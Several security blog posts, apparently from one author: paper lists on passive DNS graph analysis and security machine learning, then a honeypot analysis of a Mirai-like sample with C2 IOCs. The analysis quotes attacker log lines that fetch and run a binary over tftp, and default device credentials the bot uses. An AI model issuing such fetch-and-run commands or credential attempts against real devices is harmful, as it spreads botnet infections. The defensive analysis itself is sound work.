A short listing of research papers I’ve read or plan to read that use passive DNS (PDNS) data and graph analytics for identifying malicious domains.

Host-Domain Graphs

Host-domain graphs are bipartite graphs mapping hosts/IPs to the domains they either resolved (passive DNS) or visited (web proxy logs). These graphs are used heavily in operational security machine learning papers on network threat hunting because they provide insight into behavioral patterns across an enterprise or ISP.
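To make the structure concrete, here is a minimal sketch of a host-domain graph built from (host, domain) pairs. The function names and the sample records are made up for illustration and are not taken from any of the papers below; real input would come from passive DNS or proxy logs.

```python
from collections import defaultdict

def build_host_domain_graph(records):
    """Build both sides of a bipartite host-domain graph from (host, domain) pairs."""
    host_to_domains = defaultdict(set)
    domain_to_hosts = defaultdict(set)
    for host, domain in records:
        domain = domain.lower().rstrip(".")  # normalize case and trailing dot
        host_to_domains[host].add(domain)
        domain_to_hosts[domain].add(host)
    return host_to_domains, domain_to_hosts

def domains_sharing_hosts(domain, host_to_domains, domain_to_hosts):
    """For each other domain, count the hosts that queried both it and `domain`."""
    shared = defaultdict(int)
    for host in domain_to_hosts.get(domain, ()):
        for other in host_to_domains[host]:
            if other != domain:
                shared[other] += 1
    return dict(shared)

# Hypothetical sample records (host, domain)
records = [
    ("10.0.0.1", "example.com"),
    ("10.0.0.1", "bad.example"),
    ("10.0.0.2", "bad.example"),
    ("10.0.0.2", "also-bad.example"),
    ("10.0.0.3", "example.com"),
]
h2d, d2h = build_host_domain_graph(records)
neighbors = domains_sharing_hosts("bad.example", h2d, d2h)
print(neighbors)
```

Starting from a known-bad domain, the domains that share many querying hosts with it are natural candidates for a closer look. The papers use more careful inference than this simple co-occurrence count.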

Detecting Malicious Domains via Graph Inference P. K. Manadhata, S. Yadav, P. Rao, and W. Horne. In Proceedings of 19th European Symposium on Research in Computer Security, Wroclaw, Poland, September 7-11, 2014.

Detection of Early-Stage Enterprise Infection by Mining Large-Scale Log Data Alina Oprea, Zhou Li, Ting-Fang Yen, Sang H. Chin, and Sumyah Alrwais In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015.

Segugio: Efficient Behavior-Based Tracking of Malware-Control Domains in Large ISP Networks Babak Rahbarinia and Manos Antonakakis In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015

Domain Resolution Graphs (Domain-IP Graphs)

A domain resolution graph is an undirected bipartite graph representing the domain-to-IP resolutions observed in passive DNS data.
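As a rough illustration, the sketch below builds a domain resolution graph from (domain, IP) pairs and walks it to find domains connected to a seed domain through shared IPs. The helper names and sample resolutions (documentation-range IPs) are assumptions for the example, and plain reachability is a simplification of what the papers below actually compute.

```python
from collections import defaultdict, deque

def build_resolution_graph(resolutions):
    """Build an undirected bipartite graph; nodes are ("domain", name) or ("ip", addr)."""
    adj = defaultdict(set)
    for domain, ip in resolutions:
        d = ("domain", domain.lower().rstrip("."))
        i = ("ip", ip)
        adj[d].add(i)
        adj[i].add(d)
    return adj

def related_domains(adj, seed):
    """Return domains reachable from `seed` via any chain of shared IPs (BFS)."""
    start = ("domain", seed)
    if start not in adj:
        return set()
    seen = {start}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in adj[node]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return {name for kind, name in seen if kind == "domain" and name != seed}

# Hypothetical passive DNS observations (domain, IP)
resolutions = [
    ("a.example", "192.0.2.1"),
    ("b.example", "192.0.2.1"),
    ("b.example", "192.0.2.2"),
    ("c.example", "192.0.2.2"),
    ("d.example", "192.0.2.9"),
]
adj = build_resolution_graph(resolutions)
print(related_domains(adj, "a.example"))
```

In practice, shared hosting and CDNs connect many unrelated domains, so a real system would need to weight or filter edges rather than trust reachability alone.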

Notos: Building a Dynamic Reputation System for DNS M. Antonakakis, R. Perdisci, D. Dagon, W. Lee, and N. Feamster. In the Proceedings of the 19th USENIX Security Symposium, Washington, DC, USA, August 11-13, 2010.

EXPOSURE: Finding Malicious Domains using Passive DNS Analysis L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. In Proceedings of the Network and Distributed System Security Symposium, San Diego, California, USA, February 2011.

Discovering Malicious Domains through Passive DNS Data Graph Analysis Issa Khalil, Ting Yu, and Bei Guan. In Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security (ASIA CCS ‘16), 2016.


The “short links” format was inspired by O’Reilly’s Four Short Links series.

Beehive: Large-Scale Log Analysis for Detecting Suspicious Activity in Enterprise Networks Ting-Fang Yen, Alina Oprea, Kaan Onarlioglu, Todd Leetham, William Robertson, Ari Juels, and Engin Kirda In Proceedings of Annual Computer Security Applications Conference (ACSAC), 2013

An Epidemiological Study of Malware Encounters in a Large Enterprise Ting-Fang Yen, Victor Heorhiadi, Alina Oprea, Michael K. Reiter, and Ari Juels In Proceedings of ACM Conference on Computer and Communications Security (CCS), 2014

Detection of Early-Stage Enterprise Infection by Mining Large-Scale Log Data Alina Oprea, Zhou Li, Ting-Fang Yen, Sang H. Chin, and Sumyah Alrwais In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015

Segugio: Efficient Behavior-Based Tracking of Malware-Control Domains in Large ISP Networks Babak Rahbarinia and Manos Antonakakis In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015

Malicious Behavior Detection using Windows Audit Logs Konstantin Berlin, David Slater, Joshua Saxe In Proceedings of the 8th ACM Workshop on Artificial Intelligence and Security (AISec) 2015

Operational security log analytics for enterprise breach detection Zhou Li and Alina Oprea In Proceedings of the First IEEE Cybersecurity Development Conference (SecDev), 2016

Lens on the endpoint: Hunting for malicious software through endpoint data analysis. Ahmet Buyukkayhan, Alina Oprea, Zhou Li, and William Robertson. In Proceedings of Recent Advances in Intrusion Detection (RAID), 2017


PS …

This is the Definitive Security Data Science and Machine Learning Guide. It includes books, tutorials, presentations, blog posts, and research papers about solving security problems using data science.

Table of Contents

Machine Learning and Security Papers

Intrusion Detection Papers

Malware Papers

Data Collection Papers

Vulnerability Analysis/Reversing Papers

Anonymity/Privacy/OPSEC/Censorship Papers

Data Mining Papers

Cyber Crime Papers


Deep Learning and Security Papers

Deep Learning and Security Presentations

Security Data Science Blogs

Blogs that frequently cover topics on security data science, machine learning, etc. These are recommended for your RSS feed.

Security Data Science Blogposts / Tutorials

Security Data Science Projects

Open source projects and code applying data science/machine learning to security problems.

Security Data

Collection of Security and Network Data Resources.

Security Data Science Books

Security Data Science Presentations / Talks


Update (1/1/2017): I will no longer be updating this page. All future updates will go to The Definitive Security Data Science and Machine Learning Guide (see the Deep Learning and Security Papers section).

This is another quick post. Over the past few months I started researching deep learning to determine if it may be useful for solving security problems. This post on The Unreasonable Effectiveness of Recurrent Neural Networks was what got me interested in this topic, and I highly recommend reading it in its entirety.

Throughout this research, I came across several academic and professional security research papers that use deep learning. What follows is a list of the papers/slides/videos that I found, which may be useful to others. If you have others that you think should be added to this list, please ping me: @jason_trost.

Deep Learning Papers on Security

Deep Learning Presentations on Security

Security Machine Learning Resources:

General Deep Learning Resources:


In a previous post, I discussed some of my experiences with heralding, a credential grabbing honeypot. In this post, I will briefly analyze a sample I downloaded over tftp using details from heralding log entries. This sample appears to be targeted at MIPS-based systems that use very weak default creds (root:5up, Admin:5up). I could find a few devices that use these creds. There are likely many more.

In my previous post I mentioned that I was not able to download a sample using the tftp commands. Today, I was finally able to download one of the samples via tftp without it timing out.

# Command from Heralding log: tftp -l 7up -r 7up -g
$ tftp 
tftp> connect
tftp> get 7up
Received 45065 bytes in 6.4 seconds
$ md5sum 7up 
3f3863996071b4f32ca8f8e1bfe27a45  7up

According to 3 AVs on VirusTotal, 3f3863996071b4f32ca8f8e1bfe27a45 is Mirai, but the IPs performing the telnet scans only attempted 2 username/password combinations. The Mirai source code uses many more, so this may be a new variant or something completely different.

$ grep -F 'tftp -l 7up -r 7up -g' heralding_activity.log | csvcut -c 4 | sort -u  > /tmp/7up-scanners
$ wc -l /tmp/7up-scanners 
     338 /tmp/7up-scanners
$ grep -F -f /tmp/7up-scanners heralding_activity.log | csvcut -c 9,10 | sort | uniq -c | sort -nr
    693 cd /var/tmp;cd /tmp;rm -f *;tftp -l 7up -r 7up -g;chmod a+x 7up;./7up,system
    350 Admin,5up
    347 root,5up
      2 cd /var/tmp;cd /tmp;rm -f *;tftp -l 7up -r 7up -g;chmod a+x 7up;./7up,system
      2 cd /var/tmp;cd /tmp;rm -f *;tftp -l 7up -r 7up -g;chmod a+x 7up;./7up,system
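For anyone who prefers to do this in Python, here is a rough equivalent of the grep/csvcut pipeline above. It assumes the log is a CSV in which column 4 is the source IP and columns 9 and 10 are the username and password (matching the csvcut column numbers used above). The sample rows are made up. Unlike `grep -F -f`, it matches scanner IPs exactly on the source IP column rather than anywhere in the line.

```python
import csv
import io
from collections import Counter

MARKER = "tftp -l 7up -r 7up -g"

def credential_counts(lines, marker=MARKER, ip_col=3, user_col=8, pass_col=9):
    """Find source IPs that sent `marker`, then count every (user, password) they tried.

    Column indexes are 0-based, so 3/8/9 correspond to csvcut columns 4/9/10.
    """
    needed = max(ip_col, user_col, pass_col)
    rows = [row for row in csv.reader(lines) if len(row) > needed]
    scanners = {row[ip_col] for row in rows if any(marker in field for field in row)}
    counts = Counter(
        (row[user_col], row[pass_col]) for row in rows if row[ip_col] in scanners
    )
    return scanners, counts

def make_row(ip, user, password):
    """Build a hypothetical 10-column log row; only columns 4, 9, and 10 matter here."""
    return ["ts", "id", "sess", ip, "sport", "dip", "dport", "telnet", user, password]

# Hypothetical log content written as CSV
buf = io.StringIO()
writer = csv.writer(buf)
writer.writerow(make_row("198.51.100.7", "root", "5up"))
writer.writerow(make_row("198.51.100.7", "cd /tmp;tftp -l 7up -r 7up -g;./7up", "system"))
writer.writerow(make_row("198.51.100.8", "admin", "admin"))
buf.seek(0)

scanners, counts = credential_counts(buf)
for (user, password), n in counts.most_common():
    print(n, user, password)
```

To run it against a real log, pass an open file object instead of the in-memory buffer, and adjust the column indexes if your heralding version lays out its CSV differently.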

Here are the IPs observed trying to get my honeypot to download and execute this specific sample (via “tftp -l 7up -r 7up -g”).

Docker + qemu-mips

h/t to Andrew Morris for his post: Quick TR069 Botnet Writeup + Triage. I used his method to run this file using Docker and qemu-mips to get some network IOCs and it worked very well.

$ docker pull asmimproved/qemu-mips
Using default tag: latest
latest: Pulling from asmimproved/qemu-mips

fdd5d7827f33: Pull complete 
a3ed95caeb02: Pull complete 
04f80dca1be3: Pull complete 
ec0e3823cad3: Pull complete 
479203818acd: Pull complete 
535b517723bd: Pull complete 
244dc522b0d5: Pull complete 
50d7b54d9c62: Pull complete 
8d61a54cd693: Pull complete 
bf48617ae046: Pull complete 
Digest: sha256:e55d85503449307b7621c595d821a84bd14a7ba38a29c9c387b364f90fd33dae
Status: Downloaded newer image for asmimproved/qemu-mips:latest

$ docker run -it asmimproved/qemu-mips

root@46621b449dc5:/project# apt-get install -y tcpdump
root@46621b449dc5:/project# tcpdump -s0 -w packets.pcap
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

In another terminal, run this:

$ docker ps
CONTAINER ID        IMAGE                   COMMAND             CREATED                  STATUS              PORTS               NAMES
46621b449dc5        asmimproved/qemu-mips   "bash"              Less than a second ago   Up 5 seconds                            happy_wright
$ docker cp 7up 46621b449dc5:/tmp/
$ docker exec -it 46621b449dc5 /bin/bash

root@46621b449dc5:/project# cd /tmp
root@46621b449dc5:/tmp# chmod 755 7up
root@46621b449dc5:/tmp# qemu-mips ./7up
Socket Bind: Address already in use

Switch back to the tcpdump terminal and kill it. Also, and this is very important, kill the “qemu-mips 7up” processes. The 7up sample immediately starts scanning port 23 at a high rate, so you don’t want it running very long.

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
^C3756 packets captured
4076 packets received by filter
0 packets dropped by kernel

root@46621b449dc5:/project# tcpdump -r packets.pcap -vvvv -nnNN -tttt 'udp port 53'
reading from file packets.pcap, link-type EN10MB (Ethernet)
2016-12-20 15:04:11.691645 IP (tos 0x0, ttl 64, id 16082, offset 0, flags [DF], proto UDP (17), length 60) > [bad udp cksum 0xbc5c -> 0xd5ae!] 13078+ A? inandoutand.in. (32)
2016-12-20 15:04:13.705981 IP (tos 0x0, ttl 37, id 8572, offset 0, flags [none], proto UDP (17), length 76) > [udp sum ok] 13078 q: A? inandoutand.in. 1/0/0 inandoutand.in. [9m59s] A (48)
2016-12-20 15:04:16.701336 IP (tos 0x0, ttl 64, id 16149, offset 0, flags [DF], proto UDP (17), length 63) > [bad udp cksum 0xbc5f -> 0xb781!] 13078+ A? hrjlyymassqx.tech. (35)
2016-12-20 15:04:16.841608 IP (tos 0x0, ttl 37, id 2120, offset 0, flags [none], proto UDP (17), length 79) > [udp sum ok] 13078 q: A? hrjlyymassqx.tech. 1/0/0 hrjlyymassqx.tech. [59s] A (51)

As you can see from the pcap, we were able to extract a couple of IOCs:

  • hrjlyymassqx[.]tech (94.156.128[.]73)
  • inandoutand[.]in (94.156.128[.]70)
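Pulling the queried names out of the tcpdump text output by eye works for two domains, but it can also be scripted. The sketch below is a minimal, regex-based approach that only handles A-record queries in the output format shown above. The sample lines are trimmed copies of the capture output, and the function names are my own.

```python
import re

# Matches the "A? name." portion of a tcpdump DNS line; the name is captured
# without its trailing dot.
A_QUERY = re.compile(r"\bA\? ([A-Za-z0-9.-]+?)\.\s")

def queried_domains(lines):
    """Return the set of domain names that appear in A-record queries."""
    found = set()
    for line in lines:
        for match in A_QUERY.finditer(line):
            found.add(match.group(1).lower())
    return found

def defang(indicator):
    """Defang a domain or IP for safe sharing, e.g. a.b -> a[.]b."""
    return indicator.replace(".", "[.]")

# Trimmed copies of the tcpdump lines from the capture
sample_lines = [
    "2016-12-20 15:04:11.691645 IP ... 13078+ A? inandoutand.in. (32)",
    "2016-12-20 15:04:13.705981 IP ... 13078 q: A? inandoutand.in. 1/0/0 inandoutand.in. [9m59s] A (48)",
    "2016-12-20 15:04:16.701336 IP ... 13078+ A? hrjlyymassqx.tech. (35)",
    "2016-12-20 15:04:16.841608 IP ... 13078 q: A? hrjlyymassqx.tech. 1/0/0 hrjlyymassqx.tech. [59s] A (51)",
]

for domain in sorted(queried_domains(sample_lines)):
    print(defang(domain))
```

For anything beyond quick triage, parsing the pcap with a proper DNS library would be more robust than matching on tcpdump's text output.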

whois hrjlyymassqx[.]tech

Privacy protected so kind of a dead end.

Domain ID: D40442546-CNIC
WHOIS Server: whois.namecheap.com
Referral URL:
Updated Date: 2016-12-14T17:02:14.0Z
Creation Date: 2016-12-09T17:01:50.0Z
Registry Expiry Date: 2017-12-09T23:59:59.0Z
Sponsoring Registrar: Namecheap
Sponsoring Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant ID: C101183632-CNIC
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code:
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext:
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
Admin ID: C101183623-CNIC
Admin Name: WhoisGuard Protected
Admin Organization: WhoisGuard, Inc.
Admin Street: P.O. Box 0823-03411
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code:
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
Tech ID: C101183621-CNIC
Tech Name: WhoisGuard Protected
Tech Organization: WhoisGuard, Inc.
Tech Street: P.O. Box 0823-03411
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code:
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
DNSSEC: unsigned
Billing ID: C101183627-CNIC
Billing Name: WhoisGuard Protected
Billing Organization: WhoisGuard, Inc.
Billing Street: P.O. Box 0823-03411
Billing City: Panama
Billing State/Province: Panama
Billing Postal Code:
Billing Country: PA
Billing Phone: +507.8365503
Billing Phone Ext:
Billing Fax: +51.17057182
Billing Fax Ext:
Billing Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
>>> Last update of WHOIS database: 2016-12-20T15:24:39.0Z <<<

whois inandoutand[.]in

Not privacy protected, and linked with some Mirai activity (see below). Also of note is the Registrant City, which is “fastflux”. Kind of funny.

Domain ID:D414400000002809790-AFIN
Created On:15-Dec-2016 14:41:33 UTC
Last Updated On:15-Dec-2016 14:41:36 UTC
Expiration Date:15-Dec-2017 14:41:33 UTC
Sponsoring Registrar:Endurance Domains Technology Pvt. Ltd. (R173-AFIN)
Registrant ID:EDT_62956067
Registrant Name:Kravitz Dlinch
Registrant Organization:Dlinch Kravitz
Registrant Street1:119 upyour lane
Registrant Street2:
Registrant Street3:
Registrant City:fastflux
Registrant State/Province:depends
Registrant Postal Code:00000
Registrant Country:CG
Registrant Phone:+242.887293717
Registrant Phone Ext.:
Registrant FAX:+242.0000000000
Registrant FAX Ext.:
Registrant Email:dlinchkravitz@gmail.com
Admin ID:EDT_62956068
Admin Name:Kravitz Dlinch
Admin Organization:Dlinch Kravitz
Admin Street1:119 upyour lane
Admin Street2:
Admin Street3:
Admin City:fastflux
Admin State/Province:depends
Admin Postal Code:00000
Admin Country:CG
Admin Phone:+242.887293717
Admin Phone Ext.:
Admin FAX:+242.0000000000
Admin FAX Ext.:
Admin Email:dlinchkravitz@gmail.com
Tech ID:EDT_62956069
Tech Name:Kravitz Dlinch
Tech Organization:Dlinch Kravitz
Tech Street1:119 upyour lane
Tech Street2:
Tech Street3:
Tech City:fastflux
Tech State/Province:depends
Tech Postal Code:00000
Tech Country:CG
Tech Phone:+242.887293717
Tech Phone Ext.:
Tech FAX:+242.0000000000
Tech FAX Ext.:
Tech Email:dlinchkravitz@gmail.com
Name Server:ns3.cnmsn.com
Name Server:ns4.cnmsn.com
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
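One thing the two whois records have in common is how recently the domains were registered. Here is a small sketch that parses the "key: value" whois text and compares each creation date with the time of the first DNS query in the capture (2016-12-20 15:04:11). It only handles the two date formats that appear in the records above, and the helper names are made up.

```python
from datetime import datetime

def parse_whois(text):
    """Parse 'Key: value' whois lines into a dict of key -> list of values."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields.setdefault(key.strip(), []).append(value.strip())
    return fields

# Only the two creation-date layouts seen in the records above
DATE_FORMATS = (
    ("Creation Date", "%Y-%m-%dT%H:%M:%S.%fZ"),
    ("Created On", "%d-%b-%Y %H:%M:%S UTC"),
)

def creation_date(fields):
    """Return the creation datetime, or None if no known date field is present."""
    for key, fmt in DATE_FORMATS:
        if key in fields:
            return datetime.strptime(fields[key][0], fmt)
    return None

# Excerpts copied from the two whois records
tech_whois = "Domain ID: D40442546-CNIC\nCreation Date: 2016-12-09T17:01:50.0Z\n"
in_whois = "Domain ID:D414400000002809790-AFIN\nCreated On:15-Dec-2016 14:41:33 UTC\n"

capture_time = datetime(2016, 12, 20, 15, 4, 11)  # first DNS query in the pcap
for name, text in (("hrjlyymassqx[.]tech", tech_whois), ("inandoutand[.]in", in_whois)):
    age = capture_time - creation_date(parse_whois(text))
    print(name, "registered", age.days, "days before the capture")
```

Both domains were registered less than two weeks before the sample was captured.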

Searching for the registrant email, dlinchkravitz[@]gmail[.]com, turns up these blog posts:

These domains were not on the pre-computed list of DGA domains (Mirai DGA Domains from GovCERT.ch), and the .in domain uses a TLD not supported by this Mirai DGA algorithm. After some more searching, I found that Mirai’s DGA has been updated (New Mirai DGA Seed 0x91 Brute Forced), and the “hrjlyymassqx” domain was in their list.
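The check described above can be sketched as a small triage function: first see whether the domain's TLD is one the DGA can produce at all, then look it up in a pre-computed list. The TLD set and the list contents below are placeholders for illustration. The real values would come from the published DGA analysis and domain lists, and this does not implement the DGA itself.

```python
def triage_domain(domain, known_dga_domains, supported_tlds):
    """Classify a domain against a pre-computed DGA list.

    Returns "tld-not-supported", "known-dga", or "unlisted".
    """
    domain = domain.lower().rstrip(".")
    _, _, tld = domain.rpartition(".")
    if tld not in supported_tlds:
        return "tld-not-supported"
    if domain in known_dga_domains:
        return "known-dga"
    return "unlisted"

# Assumption: TLD set for illustration only; verify against the DGA write-ups.
supported_tlds = {"online", "tech", "support"}

# Placeholder lists standing in for the original and updated-seed domain lists.
original_list = set()
updated_seed_list = {"hrjlyymassqx.tech"}

for candidate in ("hrjlyymassqx.tech", "inandoutand.in"):
    before = triage_domain(candidate, original_list, supported_tlds)
    after = triage_domain(candidate, updated_seed_list, supported_tlds)
    print(candidate, before, after)
```

With these placeholder inputs, the .tech domain moves from "unlisted" to "known-dga" once the updated-seed list is used, while the .in domain is ruled out by its TLD either way.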

There is a lot more that could be done with analyzing this sample and these IOCs, but I am out of time. So, that’s it for now.